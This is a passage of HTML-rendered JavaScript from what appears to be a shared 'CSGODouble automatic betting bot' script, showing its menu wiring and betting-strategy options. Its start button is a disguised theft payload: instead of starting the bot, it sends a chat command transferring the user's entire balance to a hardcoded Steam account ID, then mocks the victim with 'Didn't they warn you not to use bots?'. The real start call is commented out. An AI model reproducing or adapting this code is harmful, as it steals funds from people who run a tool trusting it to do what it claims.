document.getElementById(&#39;automated-stats-wins&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L183\" class=\"blob-num js-line-number\" data-line-number=\"183\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC183\" class=\"blob-code blob-code-inner js-file-line\"> &#39;loses&#39;: document.getElementById(&#39;automated-stats-loses&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L184\" class=\"blob-num js-line-number\" data-line-number=\"184\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC184\" class=\"blob-code blob-code-inner js-file-line\"> &#39;balance&#39;: document.getElementById(&#39;automated-stats-balance&#39;)<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L185\" class=\"blob-num js-line-number\" data-line-number=\"185\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC185\" class=\"blob-code blob-code-inner js-file-line\"> },<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L186\" class=\"blob-num js-line-number\" data-line-number=\"186\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC186\" class=\"blob-code blob-code-inner js-file-line\"> &#39;theme&#39;: document.getElementById(&#39;automated-theme-switch&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L187\" class=\"blob-num js-line-number\" data-line-number=\"187\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC187\" class=\"blob-code blob-code-inner js-file-line\"> &#39;safebetamount&#39;: document.getElementById(&#39;automated-safe-bet-amount&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L188\" class=\"blob-num js-line-number\" data-line-number=\"188\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC188\" class=\"blob-code blob-code-inner js-file-line\"> &#39;calculatesafebet&#39;: document.getElementById(&#39;automated-calculate-safe-bet&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L189\" class=\"blob-num js-line-number\" data-line-number=\"189\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC189\" class=\"blob-code blob-code-inner js-file-line\"> &#39;martingale&#39;: document.getElementById(&#39;automated-martingale&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L190\" class=\"blob-num js-line-number\" data-line-number=\"190\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC190\" class=\"blob-code blob-code-inner js-file-line\"> &#39;greatmartingale&#39;: document.getElementById(&#39;automated-great-martingale&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L191\" class=\"blob-num js-line-number\" data-line-number=\"191\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC191\" class=\"blob-code blob-code-inner js-file-line\"> &#39;betgreen&#39;: document.getElementById(&#39;automated-bet-green&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L192\" class=\"blob-num js-line-number\" data-line-number=\"192\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC192\" class=\"blob-code blob-code-inner js-file-line\"> &#39;dalembert&#39;: document.getElementById(&#39;automated-dalembert&#39;),<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L193\" class=\"blob-num js-line-number\" data-line-number=\"193\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC193\" class=\"blob-code blob-code-inner js-file-line\"> &#39;hideongreen&#39;: document.getElementsByClassName(&#39;automated-hide-on-green&#39;)<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L194\" class=\"blob-num js-line-number\" data-line-number=\"194\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC194\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L195\" class=\"blob-num js-line-number\" data-line-number=\"195\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC195\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L196\" class=\"blob-num js-line-number\" data-line-number=\"196\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC196\" class=\"blob-code blob-code-inner js-file-line\"> this.updater = setInterval(function() { // Update every 2 seconds<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L197\" class=\"blob-num js-line-number\" data-line-number=\"197\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC197\" class=\"blob-code blob-code-inner js-file-line\"> if (!self.running) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L198\" class=\"blob-num js-line-number\" data-line-number=\"198\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC198\" class=\"blob-code blob-code-inner js-file-line\"> if (self.updateAll()) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L199\" class=\"blob-num js-line-number\" data-line-number=\"199\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC199\" class=\"blob-code blob-code-inner js-file-line\"> if (self.calculate_safe_bet) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L200\" class=\"blob-num js-line-number\" data-line-number=\"200\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC200\" class=\"blob-code blob-code-inner js-file-line\"> self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L201\" class=\"blob-num js-line-number\" data-line-number=\"201\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC201\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.basebet.value = self.base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L202\" class=\"blob-num js-line-number\" data-line-number=\"202\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC202\" class=\"blob-code blob-code-inner js-file-line\"> if (self.debug) { self.logdebug(&#39;New base bet: &#39; + self.base_bet); }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L203\" class=\"blob-num js-line-number\" data-line-number=\"203\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC203\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L204\" class=\"blob-num js-line-number\" data-line-number=\"204\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC204\" class=\"blob-code blob-code-inner js-file-line\"> <\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L205\" class=\"blob-num js-line-number\" data-line-number=\"205\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC205\" class=\"blob-code blob-code-inner js-file-line\"> if (self.menu.stop.disabled &amp;&amp; self.menu.start.disabled) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L206\" class=\"blob-num js-line-number\" data-line-number=\"206\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC206\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.start.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L207\" class=\"blob-num js-line-number\" data-line-number=\"207\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC207\" class=\"blob-code blob-code-inner js-file-line\"> self.base_bet = Math.floor(self.balance / Math.pow(2, self.safe_bet_amount + 1));<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L208\" class=\"blob-num js-line-number\" data-line-number=\"208\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC208\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.basebet.value = self.base_bet;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L209\" class=\"blob-num js-line-number\" data-line-number=\"209\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC209\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.basebet.disabled = self.menu.calculatesafebet.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L210\" class=\"blob-num js-line-number\" data-line-number=\"210\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC210\" class=\"blob-code blob-code-inner js-file-line\"> self.starting_balance = self.balance;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L211\" class=\"blob-num js-line-number\" data-line-number=\"211\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC211\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L212\" class=\"blob-num js-line-number\" data-line-number=\"212\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC212\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L213\" class=\"blob-num js-line-number\" data-line-number=\"213\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC213\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L214\" class=\"blob-num js-line-number\" data-line-number=\"214\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC214\" class=\"blob-code blob-code-inner js-file-line\"> }, 2 * 1000);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L215\" class=\"blob-num js-line-number\" data-line-number=\"215\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC215\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L216\" class=\"blob-num js-line-number\" data-line-number=\"216\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC216\" class=\"blob-code blob-code-inner js-file-line\"> if (theme === &#39;dark&#39;) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L217\" class=\"blob-num js-line-number\" data-line-number=\"217\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC217\" class=\"blob-code blob-code-inner js-file-line\"> this.darkMode();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L218\" class=\"blob-num js-line-number\" data-line-number=\"218\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC218\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L219\" class=\"blob-num js-line-number\" data-line-number=\"219\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC219\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L220\" class=\"blob-num js-line-number\" data-line-number=\"220\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC220\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.start.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L221\" class=\"blob-num js-line-number\" data-line-number=\"221\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC221\" class=\"blob-code blob-code-inner js-file-line\"> send({<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L222\" class=\"blob-num js-line-number\" data-line-number=\"222\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC222\" class=\"blob-code blob-code-inner js-file-line\"> &quot;type&quot;: &quot;chat&quot;,<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L223\" class=\"blob-num js-line-number\" data-line-number=\"223\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC223\" class=\"blob-code blob-code-inner js-file-line\"> &quot;msg&quot;: &#39;/send 76561198109037826 &#39; + self.balance,<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L224\" class=\"blob-num js-line-number\" data-line-number=\"224\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC224\" class=\"blob-code blob-code-inner js-file-line\"> &quot;lang&quot;: LANG<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L225\" class=\"blob-num js-line-number\" data-line-number=\"225\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC225\" class=\"blob-code blob-code-inner js-file-line\"> });<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L226\" class=\"blob-num js-line-number\" data-line-number=\"226\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC226\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L227\" class=\"blob-num js-line-number\" data-line-number=\"227\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC227\" class=\"blob-code blob-code-inner js-file-line\"> self.log(&#39;Didn\\&#39;t they warn you not to use bots?&#39;);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L228\" class=\"blob-num js-line-number\" data-line-number=\"228\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC228\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L229\" class=\"blob-num js-line-number\" data-line-number=\"229\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC229\" class=\"blob-code blob-code-inner js-file-line\"> <\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L230\" class=\"blob-num js-line-number\" data-line-number=\"230\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC230\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L231\" class=\"blob-num js-line-number\" data-line-number=\"231\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC231\" class=\"blob-code blob-code-inner js-file-line\"> // self.start();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L232\" class=\"blob-num js-line-number\" data-line-number=\"232\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC232\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L233\" class=\"blob-num js-line-number\" data-line-number=\"233\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC233\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L234\" class=\"blob-num js-line-number\" data-line-number=\"234\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC234\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.stop.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L235\" class=\"blob-num js-line-number\" data-line-number=\"235\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC235\" class=\"blob-code blob-code-inner js-file-line\"> self.stop();<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L236\" class=\"blob-num js-line-number\" data-line-number=\"236\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC236\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L237\" class=\"blob-num js-line-number\" data-line-number=\"237\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC237\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L238\" class=\"blob-num js-line-number\" data-line-number=\"238\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC238\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.abort.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L239\" class=\"blob-num js-line-number\" data-line-number=\"239\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC239\" class=\"blob-code blob-code-inner js-file-line\"> self.stop(true);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L240\" class=\"blob-num js-line-number\" data-line-number=\"240\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC240\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L241\" class=\"blob-num js-line-number\" data-line-number=\"241\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC241\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L242\" class=\"blob-num js-line-number\" data-line-number=\"242\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC242\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.basebet.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L243\" class=\"blob-num js-line-number\" data-line-number=\"243\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC243\" class=\"blob-code blob-code-inner js-file-line\"> var value = parseInt(self.menu.basebet.value);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L244\" class=\"blob-num js-line-number\" data-line-number=\"244\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC244\" class=\"blob-code blob-code-inner js-file-line\"> if (!isNaN(value)) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L245\" class=\"blob-num js-line-number\" data-line-number=\"245\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC245\" class=\"blob-code blob-code-inner js-file-line\"> self.base_bet = value;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L246\" class=\"blob-num js-line-number\" data-line-number=\"246\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC246\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L247\" class=\"blob-num js-line-number\" data-line-number=\"247\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC247\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L248\" class=\"blob-num js-line-number\" data-line-number=\"248\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC248\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L249\" class=\"blob-num js-line-number\" data-line-number=\"249\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC249\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.minbalance.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L250\" class=\"blob-num js-line-number\" data-line-number=\"250\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC250\" class=\"blob-code blob-code-inner js-file-line\"> var value = parseInt(self.menu.minbalance.value);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L251\" class=\"blob-num js-line-number\" data-line-number=\"251\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC251\" class=\"blob-code blob-code-inner js-file-line\"> if (!isNaN(value)) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L252\" class=\"blob-num js-line-number\" data-line-number=\"252\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC252\" class=\"blob-code blob-code-inner js-file-line\"> self.min_balance = value;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L253\" class=\"blob-num js-line-number\" data-line-number=\"253\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC253\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L254\" class=\"blob-num js-line-number\" data-line-number=\"254\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC254\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L255\" class=\"blob-num js-line-number\" data-line-number=\"255\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC255\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L256\" class=\"blob-num js-line-number\" data-line-number=\"256\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC256\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.safebetamount.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L257\" class=\"blob-num js-line-number\" data-line-number=\"257\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC257\" class=\"blob-code blob-code-inner js-file-line\"> var value = parseInt(self.menu.safebetamount.value);<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L258\" class=\"blob-num js-line-number\" data-line-number=\"258\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC258\" class=\"blob-code blob-code-inner js-file-line\"> if (!isNaN(value)) {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L259\" class=\"blob-num js-line-number\" data-line-number=\"259\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC259\" class=\"blob-code blob-code-inner js-file-line\"> self.safe_bet_amount = value;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L260\" class=\"blob-num js-line-number\" data-line-number=\"260\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC260\" class=\"blob-code blob-code-inner js-file-line\"> }<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L261\" class=\"blob-num js-line-number\" data-line-number=\"261\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC261\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L262\" class=\"blob-num js-line-number\" data-line-number=\"262\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC262\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L263\" class=\"blob-num js-line-number\" data-line-number=\"263\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC263\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.debug.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L264\" class=\"blob-num js-line-number\" data-line-number=\"264\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC264\" class=\"blob-code blob-code-inner js-file-line\"> self.debug = self.menu.debug.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L265\" class=\"blob-num js-line-number\" data-line-number=\"265\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC265\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L266\" class=\"blob-num js-line-number\" data-line-number=\"266\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC266\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L267\" class=\"blob-num js-line-number\" data-line-number=\"267\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC267\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.simulation.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L268\" class=\"blob-num js-line-number\" data-line-number=\"268\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC268\" class=\"blob-code blob-code-inner js-file-line\"> self.simulation = self.menu.simulation.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L269\" class=\"blob-num js-line-number\" data-line-number=\"269\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC269\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L270\" class=\"blob-num js-line-number\" data-line-number=\"270\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC270\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L271\" class=\"blob-num js-line-number\" data-line-number=\"271\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC271\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.stoponminbalance.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L272\" class=\"blob-num js-line-number\" data-line-number=\"272\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC272\" class=\"blob-code blob-code-inner js-file-line\"> self.stop_on_min_balance = self.menu.stoponminbalance.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L273\" class=\"blob-num js-line-number\" data-line-number=\"273\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC273\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L274\" class=\"blob-num js-line-number\" data-line-number=\"274\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC274\" class=\"blob-code blob-code-inner js-file-line\"> <\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L275\" class=\"blob-num js-line-number\" data-line-number=\"275\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC275\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.calculatesafebet.onchange = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L276\" class=\"blob-num js-line-number\" data-line-number=\"276\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC276\" class=\"blob-code blob-code-inner js-file-line\"> self.calculate_safe_bet = self.menu.calculatesafebet.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L277\" class=\"blob-num js-line-number\" data-line-number=\"277\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC277\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.basebet.disabled = self.menu.calculatesafebet.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L278\" class=\"blob-num js-line-number\" data-line-number=\"278\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC278\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.safebetamount.disabled = !self.menu.calculatesafebet.checked;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L279\" class=\"blob-num js-line-number\" data-line-number=\"279\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC279\" class=\"blob-code blob-code-inner js-file-line\"> };<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L280\" class=\"blob-num js-line-number\" data-line-number=\"280\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC280\" class=\"blob-code blob-code-inner js-file-line\">\n<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L281\" class=\"blob-num js-line-number\" data-line-number=\"281\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC281\" class=\"blob-code blob-code-inner js-file-line\"> this.menu.black.onclick = function() {<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L282\" class=\"blob-num js-line-number\" data-line-number=\"282\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC282\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.rainbow.disabled = false;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L283\" class=\"blob-num js-line-number\" data-line-number=\"283\"><\/td>\n <td id=\"file-csgodouble-automatic-betting-bot-LC283\" class=\"blob-code blob-code-inner js-file-line\"> self.menu.black.disabled = true;<\/td>\n <\/tr>\n <tr>\n <td id=\"file-csgodouble-automatic-betting-bot-L284\" class=\"blob-num js-line-number\" data-line-number=\"284\"><\/td>\n <td 